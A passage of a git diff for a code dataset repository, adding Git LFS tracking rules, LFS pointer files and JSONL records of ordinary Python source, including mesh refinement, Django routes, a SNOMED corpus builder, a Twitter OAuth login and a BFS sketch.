diff --git a/.gitattributes b/.gitattributes index 1ef325f1b111266a6b26e0196871bd78baa8c2f3..1639ae9872a078113cc444d21de7d39dd97907e0 100644 --- a/.gitattributes +++ b/.gitattributes @@ -57,3 +57,70 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text # Video files - compressed *.mp4 filter=lfs diff=lfs merge=lfs -text *.webm filter=lfs diff=lfs merge=lfs -text +1042.jsonl filter=lfs diff=lfs merge=lfs -text +1114.jsonl filter=lfs diff=lfs merge=lfs -text +1020.jsonl filter=lfs diff=lfs merge=lfs -text +1176.jsonl filter=lfs diff=lfs merge=lfs -text +1125.jsonl filter=lfs diff=lfs merge=lfs -text +1099.jsonl filter=lfs diff=lfs merge=lfs -text +1068.jsonl filter=lfs diff=lfs merge=lfs -text +056.jsonl filter=lfs diff=lfs merge=lfs -text +1163.jsonl filter=lfs diff=lfs merge=lfs -text +1110.jsonl filter=lfs diff=lfs merge=lfs -text +1204.jsonl filter=lfs diff=lfs merge=lfs -text +115.jsonl filter=lfs diff=lfs merge=lfs -text +012.jsonl filter=lfs diff=lfs merge=lfs -text +1101.jsonl filter=lfs diff=lfs merge=lfs -text +1198.jsonl filter=lfs diff=lfs merge=lfs -text +1002.jsonl filter=lfs diff=lfs merge=lfs -text +1150.jsonl filter=lfs diff=lfs merge=lfs -text +1189.jsonl filter=lfs diff=lfs merge=lfs -text +1248.jsonl filter=lfs diff=lfs merge=lfs -text +1086.jsonl filter=lfs diff=lfs merge=lfs -text +1062.jsonl filter=lfs diff=lfs merge=lfs -text +1015.jsonl filter=lfs diff=lfs merge=lfs -text +030.jsonl filter=lfs diff=lfs merge=lfs -text +1257.jsonl filter=lfs diff=lfs merge=lfs -text +003.jsonl filter=lfs diff=lfs merge=lfs -text +1149.jsonl filter=lfs diff=lfs merge=lfs -text +072.jsonl filter=lfs diff=lfs merge=lfs -text +1044.jsonl filter=lfs diff=lfs merge=lfs -text +016.jsonl filter=lfs diff=lfs merge=lfs -text +1260.jsonl filter=lfs diff=lfs merge=lfs -text +1095.jsonl filter=lfs diff=lfs merge=lfs -text +1206.jsonl filter=lfs diff=lfs merge=lfs -text +009.jsonl filter=lfs diff=lfs merge=lfs -text +102.jsonl filter=lfs diff=lfs merge=lfs -text +1215.jsonl filter=lfs diff=lfs merge=lfs -text +119.jsonl filter=lfs diff=lfs merge=lfs -text +1082.jsonl filter=lfs diff=lfs merge=lfs -text +117.jsonl filter=lfs diff=lfs merge=lfs -text +1141.jsonl filter=lfs diff=lfs merge=lfs -text +1170.jsonl filter=lfs diff=lfs merge=lfs -text +1123.jsonl filter=lfs diff=lfs merge=lfs -text +1037.jsonl filter=lfs diff=lfs merge=lfs -text +1235.jsonl filter=lfs diff=lfs merge=lfs -text +1161.jsonl filter=lfs diff=lfs merge=lfs -text +1019.jsonl filter=lfs diff=lfs merge=lfs -text +045.jsonl filter=lfs diff=lfs merge=lfs -text +078.jsonl filter=lfs diff=lfs merge=lfs -text +1132.jsonl filter=lfs diff=lfs merge=lfs -text +069.jsonl filter=lfs diff=lfs merge=lfs -text +047.jsonl filter=lfs diff=lfs merge=lfs -text +1244.jsonl filter=lfs diff=lfs merge=lfs -text +1071.jsonl filter=lfs diff=lfs merge=lfs -text +1190.jsonl filter=lfs diff=lfs merge=lfs -text +1143.jsonl filter=lfs diff=lfs merge=lfs -text +111.jsonl filter=lfs diff=lfs merge=lfs -text +027.jsonl filter=lfs diff=lfs merge=lfs -text +096.jsonl filter=lfs diff=lfs merge=lfs -text +1079.jsonl filter=lfs diff=lfs merge=lfs -text +1097.jsonl filter=lfs diff=lfs merge=lfs -text +087.jsonl filter=lfs diff=lfs merge=lfs -text +1136.jsonl filter=lfs diff=lfs merge=lfs -text +1200.jsonl filter=lfs diff=lfs merge=lfs -text +063.jsonl filter=lfs diff=lfs merge=lfs -text +074.jsonl filter=lfs diff=lfs merge=lfs -text +034.jsonl filter=lfs diff=lfs merge=lfs -text +083.jsonl filter=lfs diff=lfs merge=lfs -text +1046.jsonl filter=lfs diff=lfs merge=lfs -text diff --git a/003.jsonl b/003.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fcfec1c72cdb041adbabac2b0c24be8c5ee76796 --- /dev/null +++ b/003.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44ae63f003ddd17901e26d5deb4f271e331b4f0063f4ce18b2922ae01d470346 +size 62465952 diff --git a/009.jsonl b/009.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d8d2c49012ea8ed432544c3437d4bf44e868bb79 --- /dev/null +++ b/009.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2b52c0594d7a9159874394b1735fccdecafa8c26ccc4f27acd8e91adb86b397c +size 66633397 diff --git a/012.jsonl b/012.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..97e6f31b709c484df75f6db9ebe02bcc78e24ee4 --- /dev/null +++ b/012.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:868a872d7dad63f05d7ce4f98c043828d214d259eacdfa70e649a6b5a96932bf +size 27674199 diff --git a/016.jsonl b/016.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b38a8c83b228d5ebdac5de1343cd66d9a5710e65 --- /dev/null +++ b/016.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fb4d556e137ba407395f6ed3de6b6538c65d7865edcd4f7401a5d44bf1cd141 +size 62515203 diff --git a/027.jsonl b/027.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a57b47c76c2c077b00f87afad359bbde54c5dd59 --- /dev/null +++ b/027.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8091aa68fce5eb3e79010a1a5bbaaa229d303ca37bae94f6b7a2006acc32fbe +size 72051972 diff --git a/030.jsonl b/030.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f5d3bd0c005dcbce7af85ef0b9902b85128f6e9 --- /dev/null +++ b/030.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e340c753841723563f1ec17c4cfa68e668c2f0ab66632fcac28d80c6aa579624 +size 58807288 diff --git a/034.jsonl b/034.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..237b926b0cf59ceb4fa92567f74c68c51a23513c --- /dev/null +++ b/034.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d57da88aba37196e573503fec37af3aa852c03bd400441e48e8cd0c20fb8599 +size 73566787 diff --git a/045.jsonl b/045.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7fa8c0917e3d2486554d5c2c09d5dd044f962f9 --- /dev/null +++ b/045.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:846e19b9c082f0e695486b9abb24f011811988408cf8f2d78b7a29030f31ccca +size 64320832 diff --git a/047.jsonl b/047.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..57eb8386bbcb27bd545d1ddb9678dab4122acb52 --- /dev/null +++ b/047.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0b6c3fa30b97c8281454b37ca161dffbba7482e92d6d4d26067d0d29e85d9c3 +size 61044234 diff --git a/056.jsonl b/056.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..762a1c5ff7bfd9a12dd93a44ad48c7e5251efef8 --- /dev/null +++ b/056.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6c5030f5d0fbee29e062aaa0db899663736f3bab845d40c1d0cf502e6330533 +size 14836702 diff --git a/063.jsonl b/063.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07b341238005ecde1df2d909756f9d518d2054b4 --- /dev/null +++ b/063.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d42aa12a29895051e870b330d8030d6352c1a7c21be381f4ae2ea18428bff7f +size 69533351 diff --git a/069.jsonl b/069.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51542371b94bb5cf23f1a23ac09f7c88d66f35de --- /dev/null +++ b/069.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:563720158de887bac29ab90dbc881ea5bdb903207e38fced16e58edabd49bc0d +size 64473856 diff --git a/072.jsonl b/072.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49c688e584c047a1f543e6419ec106196035be2f --- /dev/null +++ b/072.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4459352caabe24ee53280b95921856232187d1c85c439ed630a793434134c2b9 +size 60353398 diff --git a/074.jsonl b/074.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b5a15df41aa20e16f03be405dd8a7a5eb020f7ae --- /dev/null +++ b/074.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf86d7163814ff2b4be9795491941d40c9ddefaf394fd9fa541fbc729df13417 +size 70376928 diff --git a/078.jsonl b/078.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..92ca81f0927f5e14a463a344e7b04476134e769e --- /dev/null +++ b/078.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8ef8010c9b9e744fa5f136e82d772fa94593a08f5abb4eecde3f77d04c9076ed +size 65437446 diff --git a/083.jsonl b/083.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8f5133a9639250e35a964ac85a102d135ec940c --- /dev/null +++ b/083.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79656d7237435272c5c163ee8bc0a825f4f81ae4d0f4213e2ce0e8d77466794b +size 70192158 diff --git a/087.jsonl b/087.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c6d5b45aa8a3159edbb129ec3e3463981531d8fc --- /dev/null +++ b/087.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1831046f3b4f8ddf97ffa1e708d118300dc0deb3cb669871ce463eab690af724 +size 70537929 diff --git a/096.jsonl b/096.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..07f23036c643b2874db546ebf5b752e2a065fedd --- /dev/null +++ b/096.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8ac08b191fd18c5c5db176c2c39cb34ce57b33f6beae66203f3c075ebf30103 +size 71491602 diff --git a/1000.jsonl b/1000.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..79a4100b3ec4c6907467ff5fa29566a868f04ca9 --- /dev/null +++ b/1000.jsonl @@ -0,0 +1,491 @@ +{"seq_id": "251653677", "text": "import os\nimport logging\nfrom typing import ( # noqa\n Any,\n Coroutine,\n Generator,\n Generic,\n Iterable,\n List,\n Mapping,\n Optional,\n Set,\n Tuple,\n Type,\n TypeVar,\n Union,\n)\n\nimport porepy as pp\nimport numpy as np\nimport scipy.sparse as sps\n\n# --- LOGGING UTIL ---\ntry:\n from src.mastersproject.util.logging_util import timer, trace\nexcept ImportError:\n from util.logging_util import timer, trace\n\nlogger = logging.getLogger(__name__)\n\n\n@trace(logger)\ndef refine_mesh(\n in_file: str,\n out_file: str,\n dim: int,\n network: Union[pp.FractureNetwork3d, pp.FractureNetwork2d],\n num_refinements: int = 1,\n) -> List[pp.GridBucket]:\n \"\"\" Refine a mesh by splitting, using gmsh\n\n Parameters\n ----------\n in_file : str\n path to .geo file to read\n out_file : str\n path to new .msh file to store mesh in, excluding the ending '.msh'.\n dim : int {2, 3}\n Dimension of domain to mesh\n network : Union[pp.FractureNetwork2d, pp.FractureNetwork3d]\n PorePy class defining the fracture network that is described by the .geo in_file\n num_refinements : int : Optional. Default = 1\n Number of refinements\n \"\"\"\n\n try:\n import gmsh\n except ModuleNotFoundError:\n raise ModuleNotFoundError(\n \"To run gmsh python api on your system, \"\n \"download the relevant gmsh*-sdk.* from http://gmsh.info/bin/. \"\n \"Then, Add the 'lib' directory from the SDK to PYTHONPATH: \\n\"\n \"export PYTHONPATH=${PYTHONPATH}:path/to/gmsh*-sdk.*/lib\"\n )\n\n from porepy.fracs.simplex import tetrahedral_grid_from_gmsh\n from porepy.fracs.meshing import grid_list_to_grid_bucket\n\n assert os.path.isfile(in_file)\n\n # Run gmsh\n gmsh.initialize()\n gmsh.open(in_file)\n gmsh.model.mesh.generate(dim=dim)\n if out_file[-4:] == \".msh\":\n out_file = out_file[:-4]\n\n # Save coarsest grid\n fname = f\"{out_file}_0.msh\"\n gmsh.write(fname)\n grid_list_ref = tetrahedral_grid_from_gmsh(network=network, file_name=fname)\n gb_list = [grid_list_to_grid_bucket(grid_list_ref)]\n\n for i in range(num_refinements):\n gmsh.model.mesh.refine() # Refined grid\n\n fname = f\"{out_file}_{i + 1}.msh\"\n gmsh.write(fname)\n\n # Create grid bucket from refined grid output\n grid_list_ref = tetrahedral_grid_from_gmsh(network=network, file_name=fname)\n gb_ref = grid_list_to_grid_bucket(grid_list_ref)\n gb_list.append(gb_ref.copy())\n\n gmsh.finalize()\n return gb_list\n\n\n@trace(logger)\ndef gb_coarse_fine_cell_mapping(gb: pp.GridBucket, gb_ref: pp.GridBucket, tol=1e-8):\n \"\"\" Wrapper for coarse_fine_cell_mapping to construct mapping for grids in GridBucket.\n\n Adds a node_prop to each grid in gb. The key is 'coarse_fine_cell_mapping',\n and is the mapping generated by 'coarse_fine_cell_mapping(...)'.\n\n Note: No node prop is added to the reference grids in gb_ref.\n\n Parameters\n ----------\n gb : pp.GridBucket\n Coarse grid bucket\n gb_ref : pp.GridBucket\n Refined grid bucket\n tol : float, Optional\n Tolerance for point_in_poly* -methods\n \"\"\"\n\n grids = gb.get_grids()\n grids_ref = gb_ref.get_grids()\n\n assert len(grids) == len(\n grids_ref\n ), \"Weakly check that GridBuckets refer to same domains\"\n assert np.allclose(\n np.append(*gb.bounding_box()), np.append(*gb_ref.bounding_box())\n ), \"Weakly check that GridBuckets refer to same domains\"\n\n # This method assumes a consistent node ordering between grids. At least assign one.\n gb.assign_node_ordering(overwrite_existing=False)\n gb_ref.assign_node_ordering(overwrite_existing=False)\n\n n_grids = len(grids)\n # mappings = [None]*n_grids\n mappings = {\"gb\": gb, \"gb_ref\": gb_ref}\n\n # Add node prop on the coarse grid to map from coarse to fine cells.\n gb.add_node_props(keys=\"coarse_fine_cell_mapping\")\n\n for i in np.arange(n_grids):\n g, g_ref = grids[i], grids_ref[i]\n node_num, node_num_ref = (\n gb._nodes[g][\"node_number\"],\n gb_ref._nodes[g_ref][\"node_number\"],\n )\n assert node_num == node_num_ref, \"Weakly check that grids refer to same domain.\"\n\n mapping = coarse_fine_cell_mapping(g, g_ref, tol=tol)\n gb.set_node_prop(g=g, key=\"coarse_fine_cell_mapping\", val=mapping)\n\n\n@trace(logger)\ndef coarse_fine_cell_mapping(g: pp.Grid, g_ref: pp.Grid, tol=1e-8,) -> sps.csc_matrix:\n \"\"\" Construct a mapping between cells of a grid and its refined version\n\n Assuming a regular and a refined mesh, where the refinement is executed by splitting.\n I.e. a cell in the refined grid is completely contained within a cell in the\n coarse grid.\n\n Parameters\n ----------\n g : pp.Grid\n Coarse grid\n g_ref : pp.Grid\n Refined grid\n tol : float, Optional\n Tolerance for pp.geometry_property_checks.point_in_polyhedron()\n\n Returns\n -------\n coarse_fine : sps.csc_matrix\n Column major sparse matrix mapping from coarse to fine cells.\n \"\"\"\n\n assert g.num_cells < g_ref.num_cells, \"Wrong order of input grids\"\n assert g.dim == g_ref.dim, \"Grids must be of same dimension\"\n\n cell_nodes = g.cell_nodes()\n slices = zip(\n cell_nodes.indptr[:-1], cell_nodes.indptr[1:]\n ) # start/end row pointers for each column\n\n # Create sps.csc_matrix mapping coarse cells to fine cell centers\n indptr = np.array([0])\n indices = np.empty(0)\n\n cells_ref = g_ref.cell_centers.copy() # Cell centers in fine grid\n test_cells_ptr = np.arange(g_ref.num_cells) # Pointer to cell centers\n nodes = g.nodes.copy()\n\n if g.dim == 1:\n nodes = nodes.copy()\n tangent = pp.map_geometry.compute_tangent(nodes)\n reference = [1, 0, 0]\n R = pp.map_geometry.project_line_matrix(\n nodes, tangent, tol=tol, reference=reference\n )\n nodes = R.dot(nodes)[0, :]\n cells_ref = R.dot(cells_ref)[0, :]\n\n elif g.dim == 2: # Pre-processing for efficiency\n nodes = nodes.copy()\n R = pp.map_geometry.project_plane_matrix(nodes, check_planar=False)\n nodes = np.dot(R, nodes)[:2, :]\n cells_ref = np.dot(R, cells_ref)[:2, :]\n\n # Loop through every coarse cell\n for st, nd in slices:\n\n nodes_idx = cell_nodes.indices[st:nd]\n num_nodes = nodes_idx.size\n\n if g.dim == 1:\n assert num_nodes == 2\n line = np.sort(nodes[nodes_idx])\n test_points = cells_ref[test_cells_ptr]\n in_poly = np.searchsorted(line, test_points, side=\"left\") == 1\n\n elif g.dim == 2:\n assert num_nodes == 3, \"We assume simplexes in 2D (i.e. 3 nodes)\"\n polygon = nodes[:, nodes_idx]\n test_points = cells_ref[:, test_cells_ptr]\n in_poly = pp.geometry_property_checks.point_in_polygon(\n polygon, test_points, tol=tol\n )\n\n elif g.dim == 3:\n # Make polyhedron from node coordinates\n # Polyhedron defined as a list of nodes defining its (convex) faces.\n # Assumes simplexes: Every node except one defines every face.\n assert num_nodes == 4, \"We assume simplexes in 3D (i.e. 4 nodes)\"\n node_coords = nodes[:, nodes_idx]\n\n ids = np.arange(num_nodes)\n polyhedron = [node_coords[:, ids != i] for i in np.arange(num_nodes)]\n test_points = cells_ref[\n :, test_cells_ptr\n ] # Test only points not inside another polyhedron.\n in_poly = pp.geometry_property_checks.point_in_polyhedron(\n polyhedron=polyhedron, test_points=test_points, tol=tol\n )\n\n else:\n logger.warning(f\"A grid of dimension {g.dim} encountered. Skip!\")\n continue\n\n # Update pointer to which cell centers to use as test points\n in_poly_ids = test_cells_ptr[in_poly] # id of cells inside this polyhedron\n test_cells_ptr = test_cells_ptr[\n ~in_poly\n ] # Keep only cells not inside this polyhedron\n\n # Update mapping\n indices = np.append(indices, in_poly_ids)\n indptr = np.append(indptr, indptr[-1] + in_poly_ids.size)\n\n data = np.ones(indices.size)\n\n coarse_fine = sps.csc_matrix((data, indices, indptr))\n\n assert (\n indices.size == g_ref.num_cells\n ), \"Every fine cell should be inside exactly one coarse cell\"\n return coarse_fine\n", "sub_path": "src/mastersproject/refinement/refinement.py", "file_name": "refinement.py", "file_ext": "py", "file_size_in_byte": 8514, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 37, "usage_type": "name"}, {"api_name": "porepy.FractureNetwork3d", "line_number": 37, "usage_type": "attribute"}, {"api_name": "porepy.FractureNetwork2d", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "gmsh.initialize", "line_number": 72, "usage_type": "call"}, {"api_name": "gmsh.open", "line_number": 73, "usage_type": "call"}, {"api_name": "gmsh.model.mesh.generate", "line_number": 74, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 74, "usage_type": "attribute"}, {"api_name": "gmsh.write", "line_number": 80, "usage_type": "call"}, {"api_name": "porepy.fracs.simplex.tetrahedral_grid_from_gmsh", "line_number": 81, "usage_type": "call"}, {"api_name": "porepy.fracs.meshing.grid_list_to_grid_bucket", "line_number": 82, "usage_type": "call"}, {"api_name": "gmsh.model.mesh.refine", "line_number": 85, "usage_type": "call"}, {"api_name": "gmsh.model", "line_number": 85, "usage_type": "attribute"}, {"api_name": "gmsh.write", "line_number": 88, "usage_type": "call"}, {"api_name": "porepy.fracs.simplex.tetrahedral_grid_from_gmsh", "line_number": 91, "usage_type": "call"}, {"api_name": "porepy.fracs.meshing.grid_list_to_grid_bucket", "line_number": 92, "usage_type": "call"}, {"api_name": "gmsh.finalize", "line_number": 95, "usage_type": "call"}, {"api_name": "util.logging_util.trace", "line_number": 32, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 39, "usage_type": "name"}, {"api_name": "porepy.GridBucket", "line_number": 39, "usage_type": "attribute"}, {"api_name": "porepy.GridBucket", "line_number": 100, "usage_type": "attribute"}, {"api_name": "numpy.allclose", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 139, "usage_type": "call"}, {"api_name": "util.logging_util.trace", "line_number": 99, "usage_type": "call"}, {"api_name": "porepy.Grid", "line_number": 152, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "porepy.map_geometry.compute_tangent", "line_number": 192, "usage_type": "call"}, {"api_name": "porepy.map_geometry", "line_number": 192, "usage_type": "attribute"}, {"api_name": "porepy.map_geometry.project_line_matrix", "line_number": 194, "usage_type": "call"}, {"api_name": "porepy.map_geometry", "line_number": 194, "usage_type": "attribute"}, {"api_name": "porepy.map_geometry.project_plane_matrix", "line_number": 202, "usage_type": "call"}, {"api_name": "porepy.map_geometry", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.searchsorted", "line_number": 216, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks.point_in_polygon", "line_number": 222, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks", "line_number": 222, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 234, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks.point_in_polyhedron", "line_number": 238, "usage_type": "call"}, {"api_name": "porepy.geometry_property_checks", "line_number": 238, "usage_type": "attribute"}, {"api_name": "numpy.append", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 256, "usage_type": "call"}, {"api_name": "scipy.sparse.csc_matrix", "line_number": 258, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 258, "usage_type": "name"}, {"api_name": "util.logging_util.trace", "line_number": 151, "usage_type": "call"}, {"api_name": "scipy.sparse.csc_matrix", "line_number": 152, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 152, "usage_type": "name"}]} +{"seq_id": "341652372", "text": "from django.urls import path\nfrom . import views\n\napp_name = 'trip'\n\nurlpatterns = [\n path('list', views.trip_list),\n path('chk/', views.checkID),\n path('idealtag', views.idealtag),\n path('idealcategory', views.idealcategory),\n path('store_detail/', views.store_detail),\n path('today', views.trip_today),\n path('delete/', views.delete_trip),\n path('date_chk', views.date_chk),\n path('delete/date_chk', views.delete_date_chk),\n]", "sub_path": "backend/sikdorang/trip/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 491, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "437364404", "text": "# -*- coding: utf-8 -*-\n\n\"\"\"\n\n@ author: Taehyeong Kim\n@ e-mail: taehyeong93@korea.ac.kr\n\n\"\"\"\n\n\nimport pandas as pd\nimport re\nfrom keras.preprocessing.text import text_to_word_sequence\n\n\nclass SNOMED:\n \n def __init__(self):\n print(\"--- SNOMED ---\")\n \n def SNOMED_dictionary(self):\n \n # SNOMED Dictionary\n snomed=pd.read_csv(\"data/SNOMED.csv\")\n snomed_series=snomed[\"concept_name\"].dropna()\n snomed_list=list(snomed_series.unique())\n snomed_list=[x for x in snomed_list if x]\n\n dict_word=[]\n for _ in range(len(snomed_list)):\n\n temp_words = text_to_word_sequence(snomed_list[_]) #Tokenizer\n\n for _ in temp_words:\n if len(_)>1:\n result = re.sub('[^a-zA-Z]', '', _)\n dict_word.append(result)\n\n # Generate Dictionary\n with open('data/SNOMED_dictionary.txt', 'w') as f:\n for item in dict_word:\n f.write(\"%s\\n\" % item)\n\n dict_corpus = sorted(list(set(dict_word)))\n dict_corpus = [x for x in dict_corpus if x]\n print(\"Corpus count:\" + str(len(dict_corpus)))\n \n # Generate Corpus\n with open('data/misspelling_detection.txt', 'w') as f:\n for item in dict_corpus:\n f.write(\"%s\\n\" % item)\n", "sub_path": "utils/SNOMED.py", "file_name": "SNOMED.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.text_to_word_sequence", "line_number": 32, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 36, "usage_type": "call"}]} +{"seq_id": "129030125", "text": "from models.user import User\nimport constants\nimport oauth2\nimport urllib.parse as urlparse\nfrom twitter_utils import consumer, get_request_token\n\n\ndef create_authorized_user(email, first_name, last_name):\n request_token = get_request_token()\n print('Please click the following link to get a pin')\n print('{}?oauth_token={}'.format(constants.AUTHORIZATION_URL, request_token['oauth_token']))\n verified_pin = input('Please enter the pin received from Tweeter: ')\n token = oauth2.Token(request_token['oauth_token'], request_token['oauth_token_secret'])\n token.set_verifier(verified_pin)\n client = oauth2.Client(consumer, token)\n response, content = client.request(constants.ACCESS_TOKEN_URL, 'POST')\n access_token = dict(urlparse.parse_qsl(content.decode('utf-8')))\n user = User(email, first_name, last_name, access_token['oauth_token'], access_token['oauth_token_secret'])\n user.save_to_db()\n return user\n", "sub_path": "login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 942, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "twitter_utils.get_request_token", "line_number": 9, "usage_type": "call"}, {"api_name": "constants.AUTHORIZATION_URL", "line_number": 11, "usage_type": "attribute"}, {"api_name": "oauth2.Token", "line_number": 13, "usage_type": "call"}, {"api_name": "oauth2.Client", "line_number": 15, "usage_type": "call"}, {"api_name": "twitter_utils.consumer", "line_number": 15, "usage_type": "argument"}, {"api_name": "constants.ACCESS_TOKEN_URL", "line_number": 16, "usage_type": "attribute"}, {"api_name": "urllib.parse.parse_qsl", "line_number": 17, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 17, "usage_type": "name"}, {"api_name": "models.user.User", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "223985935", "text": "from repetitive import RepetitiveTask\n\nimport requests\n\n\nclass Task(RepetitiveTask):\n \"\"\"\n Get a notification when one of a list of Github repositories has a new latest release\n \"\"\"\n\n repos = ['RetroPie/RetroPie-Setup']\n\n def run(self):\n data = self.load()\n\n for repo in self.repos:\n response = requests.get('https://github.com/{}/releases/latest'.format(repo))\n version = response.url.rsplit('/', 1)[-1]\n\n if repo in data:\n if data[repo] != version:\n self.notify(\"{} has been upgrade to version {}\".format(repo, version))\n else:\n self.log(\"{} has not been updated\".format(repo))\n\n data[repo] = version\n\n self.save(data)\n", "sub_path": "hour/github_release.py", "file_name": "github_release.py", "file_ext": "py", "file_size_in_byte": 769, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "repetitive.RepetitiveTask", "line_number": 6, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "436896703", "text": "import pandas as pd\n\ndef makeGraph(i_file):\n\tfile_to_list = [l.split(' ') for l in i_file.read().split('\\n')]\n\t# print(file_to_list)\n\tdf = pd.DataFrame(file_to_list)\n\t\n\tweights = {df[1][i]:{df[2][i]}for i in df}\n\n\t# print(\"len df: \" , len(df))\n\tgraph = {}\n\t# for i in range(len(df)):\n\t\t# print(df['0'].loc(i))\n\t\t# graph[df[0].loc(i)] = weights[i] \n\tgraph = {df[0][i]:{df[1][i]:df[2][i]} for i in df}\n\n\t# print(graph)\n\n\ndef BFS(graph, start, end):\n\n\tfrom collections import deque\n\tprint(\"----------BFS---------\\n\")\n\tqueue = deque([start])\n\tprint('graph: ' , graph)\n\n\t#dictionary of previous nodes with the leading node (key - previous, value - node of path taken) \n\tprev_nodes = {}\n\t#list of the nodes for the path taken\n\tmapping = []\n\n\t#loop through nodes in path until queue is empty\n\twhile queue:\n\t\t# print('queue: ', queue)\n\t\t#grab the current node to inspect for possible paths\n\t\tnode = queue.popleft()\n\t\t# print('node: ', node)\n\n\t\t#check if te node leads anywhere\n\t\tif node in graph:\n\n\t\t\tfor neighbor in graph:\n\n\t\t\t\t#if explored, ignore it\n\t\t\t\tif neighbor in graph[node]:\n\t\t\t\t\tprint('gnode: ' , graph[node], '\\t neigh: ', neighbor)\n\t\t\t\t\tif neighbor in 